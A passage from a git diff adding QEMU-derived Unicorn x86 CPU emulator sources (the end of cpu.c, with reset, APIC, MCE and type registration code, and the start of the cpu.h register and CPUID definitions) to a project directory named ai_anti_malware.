env->xstate_bv = XSTATE_FP | XSTATE_SSE; + + env->pat = 0x0007040600070406ULL; + env->msr_ia32_misc_enable = MSR_IA32_MISC_ENABLE_DEFAULT; + + memset(env->dr, 0, sizeof(env->dr)); + env->dr[6] = DR6_FIXED_1; + env->dr[7] = DR7_FIXED_1; + cpu_breakpoint_remove_all(s, BP_CPU); + cpu_watchpoint_remove_all(s, BP_CPU); + + env->xcr0 = 1; + + /* + * SDM 11.11.5 requires: + * - IA32_MTRR_DEF_TYPE MSR.E = 0 + * - IA32_MTRR_PHYSMASKn.V = 0 + * All other bits are undefined. For simplification, zero it all. + */ + env->mtrr_deftype = 0; + memset(env->mtrr_var, 0, sizeof(env->mtrr_var)); + memset(env->mtrr_fixed, 0, sizeof(env->mtrr_fixed)); + +#if !defined(CONFIG_USER_ONLY) + /* We hard-wire the BSP to the first CPU. */ + if (s->cpu_index == 0) { + apic_designate_bsp(env->uc, cpu->apic_state); + } + + s->halted = !cpu_is_bsp(cpu); +#endif +} + +#ifndef CONFIG_USER_ONLY +bool cpu_is_bsp(X86CPU *cpu) +{ + return (cpu_get_apic_base((&cpu->env)->uc, cpu->apic_state) & MSR_IA32_APICBASE_BSP) != 0; +} +#endif + +static void mce_init(X86CPU *cpu) +{ + CPUX86State *cenv = &cpu->env; + unsigned int bank; + + if (((cenv->cpuid_version >> 8) & 0xf) >= 6 + && (cenv->features[FEAT_1_EDX] & (CPUID_MCE | CPUID_MCA)) == + (CPUID_MCE | CPUID_MCA)) { + cenv->mcg_cap = MCE_CAP_DEF | MCE_BANKS_DEF; + cenv->mcg_ctl = ~(uint64_t)0; + for (bank = 0; bank < MCE_BANKS_DEF; bank++) { + cenv->mce_banks[bank * 4] = ~(uint64_t)0; + } + } +} + +#ifndef CONFIG_USER_ONLY +static void x86_cpu_apic_create(X86CPU *cpu, Error **errp) +{ +#if 0 + DeviceState *dev = DEVICE(cpu); + APICCommonState *apic; + const char *apic_type = "apic"; + + cpu->apic_state = qdev_try_create(qdev_get_parent_bus(dev), apic_type); + if (cpu->apic_state == NULL) { + error_setg(errp, "APIC device '%s' could not be created", apic_type); + return; + } + + object_property_add_child(OBJECT(cpu), "apic", + OBJECT(cpu->apic_state), NULL); + //qdev_prop_set_uint8(cpu->apic_state, "id", env->cpuid_apic_id); + /* TODO: convert to link<> */ + apic = APIC_COMMON(cpu->apic_state); + apic->cpu = cpu; +#endif +} + +static void x86_cpu_apic_realize(X86CPU *cpu, Error **errp) +{ + if (cpu->apic_state == NULL) { + return; + } + + if (qdev_init(cpu->apic_state)) { + error_setg(errp, "APIC device '%s' could not be initialized", + object_get_typename(OBJECT(cpu->apic_state))); + return; + } +} +#else +static void x86_cpu_apic_realize(X86CPU *cpu, Error **errp) +{ +} +#endif + + +#define IS_INTEL_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_INTEL_1 && \ + (env)->cpuid_vendor2 == CPUID_VENDOR_INTEL_2 && \ + (env)->cpuid_vendor3 == CPUID_VENDOR_INTEL_3) +#define IS_AMD_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_AMD_1 && \ + (env)->cpuid_vendor2 == CPUID_VENDOR_AMD_2 && \ + (env)->cpuid_vendor3 == CPUID_VENDOR_AMD_3) +static int x86_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + X86CPU *cpu = X86_CPU(uc, dev); + X86CPUClass *xcc = X86_CPU_GET_CLASS(uc, dev); + CPUX86State *env = &cpu->env; + Error *local_err = NULL; + + if (env->features[FEAT_7_0_EBX] && env->cpuid_level < 7) { + env->cpuid_level = 7; + } + + /* On AMD CPUs, some CPUID[8000_0001].EDX bits must match the bits on + * CPUID[1].EDX. + */ + if (IS_AMD_CPU(env)) { + env->features[FEAT_8000_0001_EDX] &= ~CPUID_EXT2_AMD_ALIASES; + env->features[FEAT_8000_0001_EDX] |= (env->features[FEAT_1_EDX] + & CPUID_EXT2_AMD_ALIASES); + } + + if (x86_cpu_filter_features(cpu) && cpu->enforce_cpuid) { + error_setg(&local_err, + "TCG doesn't support requested features"); + goto out; + } + +#ifndef CONFIG_USER_ONLY + //qemu_register_reset(x86_cpu_machine_reset_cb, cpu); + + if (cpu->env.features[FEAT_1_EDX] & CPUID_APIC || smp_cpus > 1) { + x86_cpu_apic_create(cpu, &local_err); + if (local_err != NULL) { + goto out; + } + } +#endif + + mce_init(cpu); + if (qemu_init_vcpu(cs)) + return -1; + + x86_cpu_apic_realize(cpu, &local_err); + if (local_err != NULL) { + goto out; + } + cpu_reset(cs); + + xcc->parent_realize(uc, dev, &local_err); +out: + if (local_err != NULL) { + error_propagate(errp, local_err); + return -1; + } + + return 0; +} + +/* Enables contiguous-apic-ID mode, for compatibility */ +static bool compat_apic_id_mode; + +void enable_compat_apic_id_mode(void) +{ + compat_apic_id_mode = true; +} + +/* Calculates initial APIC ID for a specific CPU index + * + * Currently we need to be able to calculate the APIC ID from the CPU index + * alone (without requiring a CPU object), as the QEMU<->Seabios interfaces have + * no concept of "CPU index", and the NUMA tables on fw_cfg need the APIC ID of + * all CPUs up to max_cpus. + */ +uint32_t x86_cpu_apic_id_from_index(unsigned int cpu_index) +{ + uint32_t correct_id; + + correct_id = x86_apicid_from_cpu_idx(smp_cores, smp_threads, cpu_index); + if (compat_apic_id_mode) { + if (cpu_index != correct_id) { + //error_report("APIC IDs set in compatibility mode, " + // "CPU topology won't match the configuration"); + } + return cpu_index; + } else { + return correct_id; + } +} + +static void x86_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + //printf("... X86 initialize (object)\n"); + CPUState *cs = CPU(obj); + X86CPU *cpu = X86_CPU(cs->uc, obj); + X86CPUClass *xcc = X86_CPU_GET_CLASS(uc, obj); + CPUX86State *env = &cpu->env; + + cs->env_ptr = env; + cpu_exec_init(env, opaque); + + object_property_add(obj, "family", "int", + x86_cpuid_version_get_family, + x86_cpuid_version_set_family, NULL, NULL, NULL); + object_property_add(obj, "model", "int", + x86_cpuid_version_get_model, + x86_cpuid_version_set_model, NULL, NULL, NULL); + object_property_add(obj, "stepping", "int", + x86_cpuid_version_get_stepping, + x86_cpuid_version_set_stepping, NULL, NULL, NULL); + object_property_add(obj, "level", "int", + x86_cpuid_get_level, + x86_cpuid_set_level, NULL, NULL, NULL); + object_property_add(obj, "xlevel", "int", + x86_cpuid_get_xlevel, + x86_cpuid_set_xlevel, NULL, NULL, NULL); + object_property_add_str(obj, "vendor", + x86_cpuid_get_vendor, + x86_cpuid_set_vendor, NULL); + object_property_add_str(obj, "model-id", + x86_cpuid_get_model_id, + x86_cpuid_set_model_id, NULL); + object_property_add(obj, "tsc-frequency", "int", + x86_cpuid_get_tsc_freq, + x86_cpuid_set_tsc_freq, NULL, NULL, NULL); + object_property_add(obj, "apic-id", "int", + x86_cpuid_get_apic_id, + x86_cpuid_set_apic_id, NULL, NULL, NULL); + object_property_add(obj, "feature-words", "X86CPUFeatureWordInfo", + x86_cpu_get_feature_words, + NULL, NULL, (void *)env->features, NULL); + object_property_add(obj, "filtered-features", "X86CPUFeatureWordInfo", + x86_cpu_get_feature_words, + NULL, NULL, (void *)cpu->filtered_features, NULL); + + cpu->hyperv_spinlock_attempts = HYPERV_SPINLOCK_NEVER_RETRY; + env->cpuid_apic_id = x86_cpu_apic_id_from_index(cs->cpu_index); + + x86_cpu_load_def(cpu, xcc->cpu_def, &error_abort); + + /* init various static tables used in TCG mode */ + if (tcg_enabled(env->uc)) + optimize_flags_init(env->uc); +} + +static int64_t x86_cpu_get_arch_id(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + return env->cpuid_apic_id; +} + +static bool x86_cpu_get_paging_enabled(const CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + + return (cpu->env.cr[0] & CR0_PG_MASK) != 0; +} + +static void x86_cpu_set_pc(CPUState *cs, vaddr value) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + + cpu->env.eip = value; +} + +static void x86_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + + cpu->env.eip = tb->pc - tb->cs_base; +} + +static bool x86_cpu_has_work(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + +#if !defined(CONFIG_USER_ONLY) + if (cs->interrupt_request & CPU_INTERRUPT_POLL) { + apic_poll_irq(cpu->apic_state); + cpu_reset_interrupt(cs, CPU_INTERRUPT_POLL); + } +#endif + + return ((cs->interrupt_request & CPU_INTERRUPT_HARD) && + (env->eflags & IF_MASK)) || + (cs->interrupt_request & (CPU_INTERRUPT_NMI | + CPU_INTERRUPT_INIT | + CPU_INTERRUPT_SIPI | + CPU_INTERRUPT_MCE)); +} + +static void x86_cpu_common_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + //printf("... init X86 cpu common class\n"); + X86CPUClass *xcc = X86_CPU_CLASS(uc, oc); + CPUClass *cc = CPU_CLASS(uc, oc); + DeviceClass *dc = DEVICE_CLASS(uc, oc); + + xcc->parent_realize = dc->realize; + dc->realize = x86_cpu_realizefn; + dc->bus_type = TYPE_ICC_BUS; + + xcc->parent_reset = cc->reset; + cc->reset = x86_cpu_reset; + cc->reset_dump_flags = CPU_DUMP_FPU | CPU_DUMP_CCOP; + + cc->class_by_name = x86_cpu_class_by_name; + cc->parse_features = x86_cpu_parse_featurestr; + cc->has_work = x86_cpu_has_work; + cc->do_interrupt = x86_cpu_do_interrupt; + cc->cpu_exec_interrupt = x86_cpu_exec_interrupt; + cc->dump_state = x86_cpu_dump_state; + cc->set_pc = x86_cpu_set_pc; + cc->synchronize_from_tb = x86_cpu_synchronize_from_tb; + cc->get_arch_id = x86_cpu_get_arch_id; + cc->get_paging_enabled = x86_cpu_get_paging_enabled; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = x86_cpu_handle_mmu_fault; +#else + cc->get_memory_mapping = x86_cpu_get_memory_mapping; + cc->get_phys_page_debug = x86_cpu_get_phys_page_debug; +#endif +#ifndef CONFIG_USER_ONLY + cc->debug_excp_handler = breakpoint_handler; +#endif + cc->cpu_exec_enter = x86_cpu_exec_enter; + cc->cpu_exec_exit = x86_cpu_exec_exit; +} + +void x86_cpu_register_types(void *opaque) +{ + const TypeInfo x86_cpu_type_info = { + TYPE_X86_CPU, + TYPE_CPU, + + sizeof(X86CPUClass), + sizeof(X86CPU), + opaque, + + x86_cpu_initfn, + NULL, + NULL, + + NULL, + + x86_cpu_common_class_init, + NULL, + NULL, + + true, + }; + + //printf("... register X86 cpu\n"); + int i; + + type_register_static(opaque, &x86_cpu_type_info); + for (i = 0; i < ARRAY_SIZE(builtin_x86_defs); i++) { + x86_register_cpudef_type(opaque, &builtin_x86_defs[i]); + } + //printf("... END OF register X86 cpu\n"); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.h new file mode 100644 index 0000000..0088730 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.h @@ -0,0 +1,1386 @@ +/* + * i386 virtual CPU header + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#ifndef CPU_I386_H +#define CPU_I386_H + +#include "config.h" +#include "qemu-common.h" + +#ifdef TARGET_X86_64 +#define TARGET_LONG_BITS 64 +#else +#define TARGET_LONG_BITS 32 +#endif + +/* target supports implicit self modifying code */ +#define TARGET_HAS_SMC +/* support for self modifying code even if the modified instruction is + close to the modifying instruction */ +#define TARGET_HAS_PRECISE_SMC + +#define TARGET_HAS_ICE 1 + +#ifdef TARGET_X86_64 +#define ELF_MACHINE EM_X86_64 +#define ELF_MACHINE_UNAME "x86_64" +#else +#define ELF_MACHINE EM_386 +#define ELF_MACHINE_UNAME "i686" +#endif + +#define CPUArchState struct CPUX86State + +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define R_EAX 0 +#define R_ECX 1 +#define R_EDX 2 +#define R_EBX 3 +#define R_ESP 4 +#define R_EBP 5 +#define R_ESI 6 +#define R_EDI 7 + +#define R_AL 0 +#define R_CL 1 +#define R_DL 2 +#define R_BL 3 +#define R_AH 4 +#define R_CH 5 +#define R_DH 6 +#define R_BH 7 + +#define R_ES 0 +#define R_CS 1 +#define R_SS 2 +#define R_DS 3 +#define R_FS 4 +#define R_GS 5 + +/* segment descriptor fields */ +#define DESC_G_MASK (1 << 23) +#define DESC_B_SHIFT 22 +#define DESC_B_MASK (1 << DESC_B_SHIFT) +#define DESC_L_SHIFT 21 /* x86_64 only : 64 bit code segment */ +#define DESC_L_MASK (1 << DESC_L_SHIFT) +#define DESC_AVL_MASK (1 << 20) +#define DESC_P_MASK (1 << 15) +#define DESC_DPL_SHIFT 13 +#define DESC_DPL_MASK (3 << DESC_DPL_SHIFT) +#define DESC_S_MASK (1 << 12) +#define DESC_TYPE_SHIFT 8 +#define DESC_TYPE_MASK (15 << DESC_TYPE_SHIFT) +#define DESC_A_MASK (1 << 8) + +#define DESC_CS_MASK (1 << 11) /* 1=code segment 0=data segment */ +#define DESC_C_MASK (1 << 10) /* code: conforming */ +#define DESC_R_MASK (1 << 9) /* code: readable */ + +#define DESC_E_MASK (1 << 10) /* data: expansion direction */ +#define DESC_W_MASK (1 << 9) /* data: writable */ + +#define DESC_TSS_BUSY_MASK (1 << 9) + +/* eflags masks */ +#define CC_C 0x0001 +#define CC_P 0x0004 +#define CC_A 0x0010 +#define CC_Z 0x0040 +#define CC_S 0x0080 +#define CC_O 0x0800 + +#define TF_SHIFT 8 +#define IOPL_SHIFT 12 +#define VM_SHIFT 17 + +#define TF_MASK 0x00000100 +#define IF_MASK 0x00000200 +#define DF_MASK 0x00000400 +#define IOPL_MASK 0x00003000 +#define NT_MASK 0x00004000 +#define RF_MASK 0x00010000 +#define VM_MASK 0x00020000 +#define AC_MASK 0x00040000 +#define VIF_MASK 0x00080000 +#define VIP_MASK 0x00100000 +#define ID_MASK 0x00200000 + +/* hidden flags - used internally by qemu to represent additional cpu + states. Only the INHIBIT_IRQ, SMM and SVMI are not redundant. We + avoid using the IOPL_MASK, TF_MASK, VM_MASK and AC_MASK bit + positions to ease oring with eflags. */ +/* current cpl */ +#define HF_CPL_SHIFT 0 +/* true if soft mmu is being used */ +#define HF_SOFTMMU_SHIFT 2 +/* true if hardware interrupts must be disabled for next instruction */ +#define HF_INHIBIT_IRQ_SHIFT 3 +/* 16 or 32 segments */ +#define HF_CS32_SHIFT 4 +#define HF_SS32_SHIFT 5 +/* zero base for DS, ES and SS : can be '0' only in 32 bit CS segment */ +#define HF_ADDSEG_SHIFT 6 +/* copy of CR0.PE (protected mode) */ +#define HF_PE_SHIFT 7 +#define HF_TF_SHIFT 8 /* must be same as eflags */ +#define HF_MP_SHIFT 9 /* the order must be MP, EM, TS */ +#define HF_EM_SHIFT 10 +#define HF_TS_SHIFT 11 +#define HF_IOPL_SHIFT 12 /* must be same as eflags */ +#define HF_LMA_SHIFT 14 /* only used on x86_64: long mode active */ +#define HF_CS64_SHIFT 15 /* only used on x86_64: 64 bit code segment */ +#define HF_RF_SHIFT 16 /* must be same as eflags */ +#define HF_VM_SHIFT 17 /* must be same as eflags */ +#define HF_AC_SHIFT 18 /* must be same as eflags */ +#define HF_SMM_SHIFT 19 /* CPU in SMM mode */ +#define HF_SVME_SHIFT 20 /* SVME enabled (copy of EFER.SVME) */ +#define HF_SVMI_SHIFT 21 /* SVM intercepts are active */ +#define HF_OSFXSR_SHIFT 22 /* CR4.OSFXSR */ +#define HF_SMAP_SHIFT 23 /* CR4.SMAP */ + +#define HF_CPL_MASK (3 << HF_CPL_SHIFT) +#define HF_SOFTMMU_MASK (1 << HF_SOFTMMU_SHIFT) +#define HF_INHIBIT_IRQ_MASK (1 << HF_INHIBIT_IRQ_SHIFT) +#define HF_CS32_MASK (1 << HF_CS32_SHIFT) +#define HF_SS32_MASK (1 << HF_SS32_SHIFT) +#define HF_ADDSEG_MASK (1 << HF_ADDSEG_SHIFT) +#define HF_PE_MASK (1 << HF_PE_SHIFT) +#define HF_TF_MASK (1 << HF_TF_SHIFT) +#define HF_MP_MASK (1 << HF_MP_SHIFT) +#define HF_EM_MASK (1 << HF_EM_SHIFT) +#define HF_TS_MASK (1 << HF_TS_SHIFT) +#define HF_IOPL_MASK (3 << HF_IOPL_SHIFT) +#define HF_LMA_MASK (1 << HF_LMA_SHIFT) +#define HF_CS64_MASK (1 << HF_CS64_SHIFT) +#define HF_RF_MASK (1 << HF_RF_SHIFT) +#define HF_VM_MASK (1 << HF_VM_SHIFT) +#define HF_AC_MASK (1 << HF_AC_SHIFT) +#define HF_SMM_MASK (1 << HF_SMM_SHIFT) +#define HF_SVME_MASK (1 << HF_SVME_SHIFT) +#define HF_SVMI_MASK (1 << HF_SVMI_SHIFT) +#define HF_OSFXSR_MASK (1 << HF_OSFXSR_SHIFT) +#define HF_SMAP_MASK (1 << HF_SMAP_SHIFT) + +/* hflags2 */ + +#define HF2_GIF_SHIFT 0 /* if set CPU takes interrupts */ +#define HF2_HIF_SHIFT 1 /* value of IF_MASK when entering SVM */ +#define HF2_NMI_SHIFT 2 /* CPU serving NMI */ +#define HF2_VINTR_SHIFT 3 /* value of V_INTR_MASKING bit */ + +#define HF2_GIF_MASK (1 << HF2_GIF_SHIFT) +#define HF2_HIF_MASK (1 << HF2_HIF_SHIFT) +#define HF2_NMI_MASK (1 << HF2_NMI_SHIFT) +#define HF2_VINTR_MASK (1 << HF2_VINTR_SHIFT) + +#define CR0_PE_SHIFT 0 +#define CR0_MP_SHIFT 1 + +#define CR0_PE_MASK (1U << 0) +#define CR0_MP_MASK (1U << 1) +#define CR0_EM_MASK (1U << 2) +#define CR0_TS_MASK (1U << 3) +#define CR0_ET_MASK (1U << 4) +#define CR0_NE_MASK (1U << 5) +#define CR0_WP_MASK (1U << 16) +#define CR0_AM_MASK (1U << 18) +#define CR0_PG_MASK (1U << 31) + +#define CR4_VME_MASK (1U << 0) +#define CR4_PVI_MASK (1U << 1) +#define CR4_TSD_MASK (1U << 2) +#define CR4_DE_MASK (1U << 3) +#define CR4_PSE_MASK (1U << 4) +#define CR4_PAE_MASK (1U << 5) +#define CR4_MCE_MASK (1U << 6) +#define CR4_PGE_MASK (1U << 7) +#define CR4_PCE_MASK (1U << 8) +#define CR4_OSFXSR_SHIFT 9 +#define CR4_OSFXSR_MASK (1U << CR4_OSFXSR_SHIFT) +#define CR4_OSXMMEXCPT_MASK (1U << 10) +#define CR4_VMXE_MASK (1U << 13) +#define CR4_SMXE_MASK (1U << 14) +#define CR4_FSGSBASE_MASK (1U << 16) +#define CR4_PCIDE_MASK (1U << 17) +#define CR4_OSXSAVE_MASK (1U << 18) +#define CR4_SMEP_MASK (1U << 20) +#define CR4_SMAP_MASK (1U << 21) + +#define DR6_BD (1 << 13) +#define DR6_BS (1 << 14) +#define DR6_BT (1 << 15) +#define DR6_FIXED_1 0xffff0ff0 + +#define DR7_GD (1 << 13) +#define DR7_TYPE_SHIFT 16 +#define DR7_LEN_SHIFT 18 +#define DR7_FIXED_1 0x00000400 +#define DR7_LOCAL_BP_MASK 0x55 +#define DR7_MAX_BP 4 +#define DR7_TYPE_BP_INST 0x0 +#define DR7_TYPE_DATA_WR 0x1 +#define DR7_TYPE_IO_RW 0x2 +#define DR7_TYPE_DATA_RW 0x3 + +#define PG_PRESENT_BIT 0 +#define PG_RW_BIT 1 +#define PG_USER_BIT 2 +#define PG_PWT_BIT 3 +#define PG_PCD_BIT 4 +#define PG_ACCESSED_BIT 5 +#define PG_DIRTY_BIT 6 +#define PG_PSE_BIT 7 +#define PG_GLOBAL_BIT 8 +#define PG_PSE_PAT_BIT 12 +#define PG_NX_BIT 63 + +#define PG_PRESENT_MASK (1 << PG_PRESENT_BIT) +#define PG_RW_MASK (1 << PG_RW_BIT) +#define PG_USER_MASK (1 << PG_USER_BIT) +#define PG_PWT_MASK (1 << PG_PWT_BIT) +#define PG_PCD_MASK (1 << PG_PCD_BIT) +#define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) +#define PG_DIRTY_MASK (1 << PG_DIRTY_BIT) +#define PG_PSE_MASK (1 << PG_PSE_BIT) +#define PG_GLOBAL_MASK (1 << PG_GLOBAL_BIT) +#define PG_PSE_PAT_MASK (1 << PG_PSE_PAT_BIT) +#define PG_ADDRESS_MASK 0x000ffffffffff000LL +#define PG_HI_RSVD_MASK (PG_ADDRESS_MASK & ~PHYS_ADDR_MASK) +#define PG_HI_USER_MASK 0x7ff0000000000000LL +#define PG_NX_MASK (1ULL << PG_NX_BIT) + +#define PG_ERROR_W_BIT 1 + +#define PG_ERROR_P_MASK 0x01 +#define PG_ERROR_W_MASK (1 << PG_ERROR_W_BIT) +#define PG_ERROR_U_MASK 0x04 +#define PG_ERROR_RSVD_MASK 0x08 +#define PG_ERROR_I_D_MASK 0x10 + +#define MCG_CTL_P (1ULL<<8) /* MCG_CAP register available */ +#define MCG_SER_P (1ULL<<24) /* MCA recovery/new status bits */ + +#define MCE_CAP_DEF (MCG_CTL_P|MCG_SER_P) +#define MCE_BANKS_DEF 10 + +#define MCG_STATUS_RIPV (1ULL<<0) /* restart ip valid */ +#define MCG_STATUS_EIPV (1ULL<<1) /* ip points to correct instruction */ +#define MCG_STATUS_MCIP (1ULL<<2) /* machine check in progress */ + +#define MCI_STATUS_VAL (1ULL<<63) /* valid error */ +#define MCI_STATUS_OVER (1ULL<<62) /* previous errors lost */ +#define MCI_STATUS_UC (1ULL<<61) /* uncorrected error */ +#define MCI_STATUS_EN (1ULL<<60) /* error enabled */ +#define MCI_STATUS_MISCV (1ULL<<59) /* misc error reg. valid */ +#define MCI_STATUS_ADDRV (1ULL<<58) /* addr reg. valid */ +#define MCI_STATUS_PCC (1ULL<<57) /* processor context corrupt */ +#define MCI_STATUS_S (1ULL<<56) /* Signaled machine check */ +#define MCI_STATUS_AR (1ULL<<55) /* Action required */ + +/* MISC register defines */ +#define MCM_ADDR_SEGOFF 0 /* segment offset */ +#define MCM_ADDR_LINEAR 1 /* linear address */ +#define MCM_ADDR_PHYS 2 /* physical address */ +#define MCM_ADDR_MEM 3 /* memory address */ +#define MCM_ADDR_GENERIC 7 /* generic */ + +#define MSR_IA32_TSC 0x10 +#define MSR_IA32_APICBASE 0x1b +#define MSR_IA32_APICBASE_BSP (1<<8) +#define MSR_IA32_APICBASE_ENABLE (1<<11) +#define MSR_IA32_APICBASE_BASE (0xfffff<<12) +#define MSR_IA32_FEATURE_CONTROL 0x0000003a +#define MSR_TSC_ADJUST 0x0000003b +#define MSR_IA32_TSCDEADLINE 0x6e0 + +#define MSR_P6_PERFCTR0 0xc1 + +#define MSR_MTRRcap 0xfe +#define MSR_MTRRcap_VCNT 8 +#define MSR_MTRRcap_FIXRANGE_SUPPORT (1 << 8) +#define MSR_MTRRcap_WC_SUPPORTED (1 << 10) + +#define MSR_IA32_SYSENTER_CS 0x174 +#define MSR_IA32_SYSENTER_ESP 0x175 +#define MSR_IA32_SYSENTER_EIP 0x176 + +#define MSR_MCG_CAP 0x179 +#define MSR_MCG_STATUS 0x17a +#define MSR_MCG_CTL 0x17b + +#define MSR_P6_EVNTSEL0 0x186 + +#define MSR_IA32_PERF_STATUS 0x198 + +#define MSR_IA32_MISC_ENABLE 0x1a0 +/* Indicates good rep/movs microcode on some processors: */ +#define MSR_IA32_MISC_ENABLE_DEFAULT 1 + +#define MSR_MTRRphysBase(reg) (0x200 + 2 * (reg)) +#define MSR_MTRRphysMask(reg) (0x200 + 2 * (reg) + 1) + +#define MSR_MTRRphysIndex(addr) ((((addr) & ~1u) - 0x200) / 2) + +#define MSR_MTRRfix64K_00000 0x250 +#define MSR_MTRRfix16K_80000 0x258 +#define MSR_MTRRfix16K_A0000 0x259 +#define MSR_MTRRfix4K_C0000 0x268 +#define MSR_MTRRfix4K_C8000 0x269 +#define MSR_MTRRfix4K_D0000 0x26a +#define MSR_MTRRfix4K_D8000 0x26b +#define MSR_MTRRfix4K_E0000 0x26c +#define MSR_MTRRfix4K_E8000 0x26d +#define MSR_MTRRfix4K_F0000 0x26e +#define MSR_MTRRfix4K_F8000 0x26f + +#define MSR_PAT 0x277 + +#define MSR_MTRRdefType 0x2ff + +#define MSR_CORE_PERF_FIXED_CTR0 0x309 +#define MSR_CORE_PERF_FIXED_CTR1 0x30a +#define MSR_CORE_PERF_FIXED_CTR2 0x30b +#define MSR_CORE_PERF_FIXED_CTR_CTRL 0x38d +#define MSR_CORE_PERF_GLOBAL_STATUS 0x38e +#define MSR_CORE_PERF_GLOBAL_CTRL 0x38f +#define MSR_CORE_PERF_GLOBAL_OVF_CTRL 0x390 + +#define MSR_MC0_CTL 0x400 +#define MSR_MC0_STATUS 0x401 +#define MSR_MC0_ADDR 0x402 +#define MSR_MC0_MISC 0x403 + +#define MSR_EFER 0xc0000080 + +#define MSR_EFER_SCE (1 << 0) +#define MSR_EFER_LME (1 << 8) +#define MSR_EFER_LMA (1 << 10) +#define MSR_EFER_NXE (1 << 11) +#define MSR_EFER_SVME (1 << 12) +#define MSR_EFER_FFXSR (1 << 14) + +#define MSR_STAR 0xc0000081 +#define MSR_LSTAR 0xc0000082 +#define MSR_CSTAR 0xc0000083 +#define MSR_FMASK 0xc0000084 +#define MSR_FSBASE 0xc0000100 +#define MSR_GSBASE 0xc0000101 +#define MSR_KERNELGSBASE 0xc0000102 +#define MSR_TSC_AUX 0xc0000103 + +#define MSR_VM_HSAVE_PA 0xc0010117 + +#define MSR_IA32_BNDCFGS 0x00000d90 + +#define XSTATE_FP (1ULL << 0) +#define XSTATE_SSE (1ULL << 1) +#define XSTATE_YMM (1ULL << 2) +#define XSTATE_BNDREGS (1ULL << 3) +#define XSTATE_BNDCSR (1ULL << 4) +#define XSTATE_OPMASK (1ULL << 5) +#define XSTATE_ZMM_Hi256 (1ULL << 6) +#define XSTATE_Hi16_ZMM (1ULL << 7) + + +/* CPUID feature words */ +typedef enum FeatureWord { + FEAT_1_EDX, /* CPUID[1].EDX */ + FEAT_1_ECX, /* CPUID[1].ECX */ + FEAT_7_0_EBX, /* CPUID[EAX=7,ECX=0].EBX */ + FEAT_8000_0001_EDX, /* CPUID[8000_0001].EDX */ + FEAT_8000_0001_ECX, /* CPUID[8000_0001].ECX */ + FEAT_8000_0007_EDX, /* CPUID[8000_0007].EDX */ + FEAT_C000_0001_EDX, /* CPUID[C000_0001].EDX */ + FEAT_KVM, /* CPUID[4000_0001].EAX (KVM_CPUID_FEATURES) */ + FEAT_SVM, /* CPUID[8000_000A].EDX */ + FEATURE_WORDS, +} FeatureWord; + +typedef uint32_t FeatureWordArray[FEATURE_WORDS]; + +/* cpuid_features bits */ +#define CPUID_FP87 (1U << 0) +#define CPUID_VME (1U << 1) +#define CPUID_DE (1U << 2) +#define CPUID_PSE (1U << 3) +#define CPUID_TSC (1U << 4) +#define CPUID_MSR (1U << 5) +#define CPUID_PAE (1U << 6) +#define CPUID_MCE (1U << 7) +#define CPUID_CX8 (1U << 8) +#define CPUID_APIC (1U << 9) +#define CPUID_SEP (1U << 11) /* sysenter/sysexit */ +#define CPUID_MTRR (1U << 12) +#define CPUID_PGE (1U << 13) +#define CPUID_MCA (1U << 14) +#define CPUID_CMOV (1U << 15) +#define CPUID_PAT (1U << 16) +#define CPUID_PSE36 (1U << 17) +#define CPUID_PN (1U << 18) +#define CPUID_CLFLUSH (1U << 19) +#define CPUID_DTS (1U << 21) +#define CPUID_ACPI (1U << 22) +#define CPUID_MMX (1U << 23) +#define CPUID_FXSR (1U << 24) +#define CPUID_SSE (1U << 25) +#define CPUID_SSE2 (1U << 26) +#define CPUID_SS (1U << 27) +#define CPUID_HT (1U << 28) +#define CPUID_TM (1U << 29) +#define CPUID_IA64 (1U << 30) +#define CPUID_PBE (1U << 31) + +#define CPUID_EXT_SSE3 (1U << 0) +#define CPUID_EXT_PCLMULQDQ (1U << 1) +#define CPUID_EXT_DTES64 (1U << 2) +#define CPUID_EXT_MONITOR (1U << 3) +#define CPUID_EXT_DSCPL (1U << 4) +#define CPUID_EXT_VMX (1U << 5) +#define CPUID_EXT_SMX (1U << 6) +#define CPUID_EXT_EST (1U << 7) +#define CPUID_EXT_TM2 (1U << 8) +#define CPUID_EXT_SSSE3 (1U << 9) +#define CPUID_EXT_CID (1U << 10) +#define CPUID_EXT_FMA (1U << 12) +#define CPUID_EXT_CX16 (1U << 13) +#define CPUID_EXT_XTPR (1U << 14) +#define CPUID_EXT_PDCM (1U << 15) +#define CPUID_EXT_PCID (1U << 17) +#define CPUID_EXT_DCA (1U << 18) +#define CPUID_EXT_SSE41 (1U << 19) +#define CPUID_EXT_SSE42 (1U << 20) +#define CPUID_EXT_X2APIC (1U << 21) +#define CPUID_EXT_MOVBE (1U << 22) +#define CPUID_EXT_POPCNT (1U << 23) +#define CPUID_EXT_TSC_DEADLINE_TIMER (1U << 24) +#define CPUID_EXT_AES (1U << 25) +#define CPUID_EXT_XSAVE (1U << 26) +#define CPUID_EXT_OSXSAVE (1U << 27) +#define CPUID_EXT_AVX (1U << 28) +#define 